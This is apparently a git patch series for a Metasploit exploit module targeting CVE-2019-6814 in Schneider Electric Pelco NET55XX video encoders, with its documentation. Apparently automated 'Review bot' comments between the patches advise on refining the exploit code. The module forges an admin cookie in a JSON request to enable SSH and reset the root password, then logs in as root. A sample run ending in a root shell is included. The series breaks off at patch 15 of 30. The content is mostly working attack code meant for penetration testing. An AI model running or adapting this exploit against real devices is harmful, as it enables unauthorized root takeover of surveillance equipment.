From 925d894f22cf6b5aefb4b8ff8da875941b87c66d Mon Sep 17 00:00:00 2001 From: vitorespf Date: Thu, 11 Jul 2019 14:10:37 -0400 Subject: [PATCH 01/30] Add files via upload --- .../schneider_electric_net55xx_encoder.rb | 188 ++++++++++++++++++ 1 file changed, 188 insertions(+) create mode 100644 modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb new file mode 100644 index 0000000000..24adddfcf1 --- /dev/null +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
@@ -0,0 +1,188 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/ssh/command_stream' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", + 'Description' => %q{ + This module exploits an inadequate access control vulnerability creating a malicious + json request to the webUI encoder, thus allowing the SSH service to be enabled , and + changing the root password. This module has been tested sucessfully on: NET5501, + NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + + + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Lucas Dinucci ', + 'Vitor Esperança ' + + ], + 'References' => + [ + ['CVE', '2019-6814'], + ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ "Universal", {} ] ], + 'Privileged' => true, + 'DisclosureDate' => "Jan 25 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(80), + OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), + OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), + OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) + ], self.class + ) + + register_advanced_options( + [ + OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]), + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH 
debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + + def rhost + datastore['RHOST'] + end + + def rport + datastore['RPORT'] + end + + def new_password + datastore['NEW_PASSWORD'] + end + + + def check + xmlPayload = '
http://schemas.xmlsoap.org/ws/2005/04/discovery/Probeuuid:f3d577a3-431f-4450-ab45-b480042b9c74http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousurn:schemas-xmlsoap-org:ws:2005:04:discovery
dp0:NetworkVideoTransmitter
' + connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) + udp_sock.put(xmlPayload) + resp = [] + resp << udp_sock.get(datastore['TIMEOUT']) + xmlResponse = resp.join(',') + disconnect_udp + + if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508" + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + def change_password + print_status("#{rhost}:80 - Attempt to change the root password...") + headers = {} + headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' + headers['Content-Type'] = 'application/json;charset=utf-8' + headers['Connection'] = 'keep-alive' + headers['Accept'] = 'application/json, text/plain, */*' + headers['Accept-Language'] = 'en-US,en;q=0.5' + headers['Accept-Encoding'] = 'gzip, deflate, br' + headers['Cache-Control'] = 'no-cache' + headers['Pragma'] = 'no-cache' + headers['Content-Lenght'] = '47' + headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214') + headers['User-Agent'] = datastore['USER_AGENT'] + + post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}" + login = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214'), + 'data' => post, + 'headers' => headers, + }, timeout=datastore['TIMEOUT']) + + if !login or login.code != 200 + fail_with(Failure::UnexpectedReply, "Failed to change root password") + end + print_good("#{rhost}:80 - Successfully changed the root password...") + end + + def do_login + print_status("#{rhost}:22 - Attempt to start a SSH connection...") + change_password + factory = ssh_socket_factory + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :port => 22, + :use_agent => false, + :config 
=> true, + :password => new_password, + :proxy => factory, + :non_interactive => true, + :verify_host_key => :never + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, 'root', opts) + end + rescue Rex::ConnectionError + return nil + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:22 SSH - Disconnected during negotiation" + return nil + rescue ::Timeout::Error + print_error "#{rhost}:22 SSH - Timed out during negotiation" + return nil + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:22 SSH - Failed authentication" + return nil + rescue Net::SSH::Exception => e + print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" + return nil + end + + if ssh + conn = Net::SSH::CommandStream.new(ssh) + return conn + end + + return nil + end + + + def exploit + conn = do_login + if conn + print_good("#{rhost}:22 - Session established ") + handler(conn.lsock) + end + end +end From 10b402fd7b5d4becdca163f626dcb62e6a1515ab Mon Sep 17 00:00:00 2001 From: vitorespf Date: Mon, 15 Jul 2019 11:47:45 -0300 Subject: [PATCH 02/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 24adddfcf1..26c51adda0 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
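Review bot: The request body in change_password is built by interpolating NEW_PASSWORD straight into a string literal (`post = "{\"enable\":true,\"passwd\":\"#{new_password}\",...}"`), so a password containing `"` or `\` produces malformed JSON and the request fails with no useful diagnostic; build it as `post = { 'enable' => true, 'passwd' => new_password, 'userid' => 'root' }.to_json` instead (the same line survives as context in the PATCH 07 hunk). Separately, `:config => true` in do_login makes net-ssh read the operator's own ~/.ssh/config, so whatever is configured there for that host is merged into the connection options; Metasploit modules normally pass `:config => false` so the module's behaviour does not depend on the local workstation. The SSH port is also hard-coded as `:port => 22` while the HTTP port stays configurable, which an advanced option (for example a constructed `SSH_PORT`) would fix cheaply.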
@@ -56,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - Opt::RHOST(), Opt::RPORT(80), OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), From 38f17b40624b25a439b7495b1819f013a31bd3dc Mon Sep 17 00:00:00 2001 From: vitorespf Date: Mon, 15 Jul 2019 11:48:43 -0300 Subject: [PATCH 03/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 26c51adda0..110f1cb64b 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -56,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - Opt::RPORT(80), OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) From 07834d7355a8c0da8217d34626256d2390f08347 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Mon, 15 Jul 2019 12:00:24 -0300 Subject: [PATCH 04/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 110f1cb64b..11ec37fb97 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508" return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def change_password From 55cc66f8933989bab1d4d382300b8a53076dab5d Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 21:27:15 -0400 Subject: [PATCH 05/30] Update schneider_electric_net55xx_encoder.rb Breaking xmlPayload into multiple lines --- .../http/schneider_electric_net55xx_encoder.rb | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 11ec37fb97..717c4c5105 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -86,7 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote def check - xmlPayload = '
http://schemas.xmlsoap.org/ws/2005/04/discovery/Probeuuid:f3d577a3-431f-4450-ab45-b480042b9c74http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousurn:schemas-xmlsoap-org:ws:2005:04:discovery
dp0:NetworkVideoTransmitter
' + xmlPayload = ''\ + ''\ + '
'\ + 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ + 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ + ''\ + 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ + ''\ + 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ + '
'\ + ''\ + ''\ + 'dp0:NetworkVideoTransmitter'\ + ''\ + ''\ + '
' connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) udp_sock.put(xmlPayload) resp = [] From c3fbd636541461580f23fc3f8410f324fc6ab215 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 21:45:06 -0400 Subject: [PATCH 06/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 717c4c5105..93aade1da9 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -109,8 +109,8 @@ class MetasploitModule < Msf::Exploit::Remote xmlResponse = resp.join(',') disconnect_udp - if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508" - return Exploit::CheckCode::Appears + if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end From 4ee745e21edfd9699d04c8acec69fbfedd3b2020 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 21:52:28 -0400 Subject: [PATCH 07/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 12 +----------- 1 file changed, 1 insertion(+), 11 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 93aade1da9..83a2f52919 100644 
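Review bot: The model test on the new `if` line is longer than it needs to be: `include?("NET5501")` already covers the `NET5501-I` and `NET5501-XT` alternatives, so five substrings suffice. Writing it as `return Exploit::CheckCode::Appears if %w[NET5501 NET5504 NET5500 NET5516 NET5508].any? { |model| xmlResponse.include?(model) }` keeps the line within the width limit and makes adding a model a one-token change. The locals `xmlResponse` and `xmlPayload` kept by this hunk are camelCase where Ruby convention is snake_case (`xml_response`, `xml_payload`). The enclosing check method starts before this hunk.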
--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -120,20 +120,10 @@ class MetasploitModule < Msf::Exploit::Remote headers = {} headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' headers['Content-Type'] = 'application/json;charset=utf-8' - headers['Connection'] = 'keep-alive' - headers['Accept'] = 'application/json, text/plain, */*' - headers['Accept-Language'] = 'en-US,en;q=0.5' - headers['Accept-Encoding'] = 'gzip, deflate, br' - headers['Cache-Control'] = 'no-cache' - headers['Pragma'] = 'no-cache' - headers['Content-Lenght'] = '47' - headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214') - headers['User-Agent'] = datastore['USER_AGENT'] - post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}" login = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214'), + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), 'data' => post, 'headers' => headers, }, timeout=datastore['TIMEOUT']) From 6897d2ce17d4cbeb1629f1ed1e69a0bc03408f2b Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 22:03:46 -0400 Subject: [PATCH 08/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 83a2f52919..479c3cfb60 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
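Review bot: `timeout=datastore['TIMEOUT']` in the send_request_cgi call kept as context at the end of this hunk is an assignment to a throwaway local, not a keyword argument; it happens to pass the value as the positional timeout, but it reads like a named parameter and will be flagged by a linter, so write `}, datastore['TIMEOUT'])`. With the extra headers removed, the two remaining `Cookie` and `Content-Type` entries could use send_request_cgi's own `'cookie'` and `'ctype'` keys instead of a hand-built `headers` hash, which removes the hash altogether. change_password's `fail_with` check sits outside this hunk.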
@@ -128,9 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote 'headers' => headers, }, timeout=datastore['TIMEOUT']) - if !login or login.code != 200 - fail_with(Failure::UnexpectedReply, "Failed to change root password") - end + fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") end From 6f21abfe08bde97fbf2223f390b1e288c5da5721 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 22:16:34 -0400 Subject: [PATCH 09/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 479c3cfb60..e92d73078d 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'net/ssh/command_stream' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -36,10 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2019-6814'], ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread' - }, 'Payload' => { 'Compat' => { @@ -56,7 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) ], self.class From 20e79e08dc602ce33197f3473fc4c75ed89e392b Mon Sep 17 00:00:00 2001 
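Review bot: The new single-line guard treats any HTTP 200 as success, so a 200 whose body reports an error (for instance a rejected password) still prints "Successfully changed the root password"; if the encoder's reply carries a status field, check it as well, e.g. `unless login && login.code == 200 && login.body.include?('<expected-success-marker>')`. I cannot see the response format from this diff, so confirm what the device returns on a rejected request before tightening the check. The start of change_password is outside this hunk.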
From: vitorespf Date: Tue, 16 Jul 2019 22:26:18 -0400 Subject: [PATCH 10/30] Update schneider_electric_net55xx_encoder.rb --- .../schneider_electric_net55xx_encoder.rb | 22 +++---------------- 1 file changed, 3 insertions(+), 19 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index e92d73078d..a0234b2175 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -63,21 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote ] ) end - - - def rhost - datastore['RHOST'] - end - - def rport - datastore['RPORT'] - end - + def new_password datastore['NEW_PASSWORD'] end - - + def check xmlPayload = ''\ ''\ @@ -101,7 +91,6 @@ class MetasploitModule < Msf::Exploit::Remote resp << udp_sock.get(datastore['TIMEOUT']) xmlResponse = resp.join(',') disconnect_udp - if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") return Exploit::CheckCode::Appears end @@ -139,13 +128,11 @@ class MetasploitModule < Msf::Exploit::Remote :non_interactive => true, :verify_host_key => :never } - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] - begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do - ssh = Net::SSH.start(rhost, 'root', opts) + ssh = Net::SSH.start(datastore['RHOST'], 'root', opts) end rescue Rex::ConnectionError return nil @@ -162,16 +149,13 @@ class MetasploitModule < Msf::Exploit::Remote print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" return nil end - if ssh conn = Net::SSH::CommandStream.new(ssh) return conn end - return nil end - def exploit conn = do_login if conn From 7a552369dfcdd7d0a5a05086f22260d700da3e02 Mon Sep 17 00:00:00 2001 
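Review bot: The third hunk replaces `rhost` with `datastore['RHOST']` in the `Net::SSH.start` call while the neighbouring print_error lines still interpolate `#{rhost}`; now that the local `def rhost` override is removed in the first hunk, the mixin's `rhost` should resolve to the same datastore value, so `ssh = Net::SSH.start(rhost, 'root', opts)` keeps the method using one accessor. The remaining hunks in this commit are whitespace only. do_login begins before the third hunk and its `return nil` tail sits in the fourth.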
From: vitorespf Date: Thu, 18 Jul 2019 10:40:31 -0300 Subject: [PATCH 11/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index a0234b2175..1b792389c2 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -19,8 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote json request to the webUI encoder, thus allowing the SSH service to be enabled , and changing the root password. This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. - - }, 'License' => MSF_LICENSE, 'Author' => @@ -115,8 +113,8 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login - print_status("#{rhost}:22 - Attempt to start a SSH connection...") change_password + print_status("#{rhost}:22 - Attempt to start a SSH connection...") factory = ssh_socket_factory opts = { :auth_methods => ['password', 'keyboard-interactive'], @@ -135,25 +133,19 @@ class MetasploitModule < Msf::Exploit::Remote ssh = Net::SSH.start(datastore['RHOST'], 'root', opts) end rescue Rex::ConnectionError - return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:22 SSH - Disconnected during negotiation" - return nil rescue ::Timeout::Error print_error "#{rhost}:22 SSH - Timed out during negotiation" - return nil rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:22 SSH - Failed authentication" - return nil rescue Net::SSH::Exception => e print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" - return nil end if ssh conn = Net::SSH::CommandStream.new(ssh) return conn end - return nil end def exploit From 6f656e51c43b4803c23dbe549c12a20e39f4ef16 Mon Sep 17 00:00:00 2001 
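Review bot: After the `return nil` lines are dropped in the third hunk, `rescue Rex::ConnectionError` in do_login has an empty body and fails silently while every other rescue prints a reason; change it to `rescue Rex::ConnectionError => e` with `print_error "#{rhost}:22 SSH - Connection failed: #{e.message}"` so the operator learns why no session came back. Moving change_password ahead of the SSH attempt (second hunk) also means the device's root password has already been changed and SSH enabled by the time any of these rescues run, so a `print_warning` in the failure path stating that the credential change was applied but no session was obtained tells the operator what state the device was left in. The trailing `if ssh ... end` plus `return nil` can become `Net::SSH::CommandStream.new(ssh) if ssh`, which is equivalent given the earlier `ssh = nil`. do_login starts in the second hunk and ends in the third.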
From: vitorespf Date: Fri, 19 Jul 2019 09:21:21 -0300 Subject: [PATCH 12/30] Add files via upload --- .../schneider_electric_net55xx_encoder.md | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md new file mode 100644 index 0000000000..8ea454916c --- /dev/null +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md 
@@ -0,0 +1,48 @@ +## Vulnerable Application + +Schneider Eletric Pelco NET55XX Encoder (CVE 2019-6814) + +Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). + This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password. + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `use use exploit/linux/http/schneider_eletric_net55xx_encoder` +- [ ] `set RHOSTS [rhosts]` +- [ ] `set RPORT [rport]` +- [ ] `set NEW_PASSWORD [new password]` +- [ ] `exploit` +- [ ] Verify you get a root shell + +## Options + +This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go. + +**NEW_PASSWORD** + +You should set a new ssh password to the vulnerable device. + + +## Scenarios + +**Schneider Electric Pelco Encoder NET5501-XT** + +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 +RHOSTS => 192.168.34.2 +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 +RPORT => 80 +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 +NEW_PASSWORD => msfrapid7 +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run + +[] 192.168.34.2:22 - Attempt to start a SSH connection... +[] 192.168.34.2:80 - Attempt to change the root password... +[+] 192.168.34.2:80 - Successfully changed the root password... +[+] 192.168.34.2:22 - Session established +[] Found shell. +[] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400 + +uname -a;id +Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown +uid=0(root) gid=0(root) groups=0(root) \ No newline at end of file From 5f3f6f5b3f106a953fe0ffcb8929bc8e9841d2f6 Mon Sep 17 00:00:00 2001 
From: vitorespf Date: Fri, 19 Jul 2019 09:54:34 -0300 Subject: [PATCH 13/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 8ea454916c..dc1d97a461 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -1,6 +1,6 @@ ## Vulnerable Application -Schneider Eletric Pelco NET55XX Encoder (CVE 2019-6814) +Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814) Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password. @@ -45,4 +45,4 @@ msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run uname -a;id Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown -uid=0(root) gid=0(root) groups=0(root) \ No newline at end of file +uid=0(root) gid=0(root) groups=0(root) From 4a2388cad7a951548c5e31ec219f6d9f0aba1c75 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:54:49 -0300 Subject: [PATCH 14/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index dc1d97a461..f2268675c5 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -8,7 +8,7 @@ Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET55 ## Verification Steps - [ ] Start `msfconsole` -- [ ] `use use exploit/linux/http/schneider_eletric_net55xx_encoder` +- [ ] `use use exploit/linux/http/schneider_electric_net55xx_encoder` - [ ] `set RHOSTS [rhosts]` - [ ] `set RPORT [rport]` - [ ] `set NEW_PASSWORD [new password]` From ea3932e31b888f90b17f6bf2fe63eb73a424467e Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:55:19 -0300 Subject: [PATCH 15/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 1b792389c2..94533326ac 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote xmlResponse = resp.join(',') disconnect_udp if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end From be791e551c6df5d4dd4fa83fdecd564d8faaf07b Mon Sep 17 00:00:00 2001 
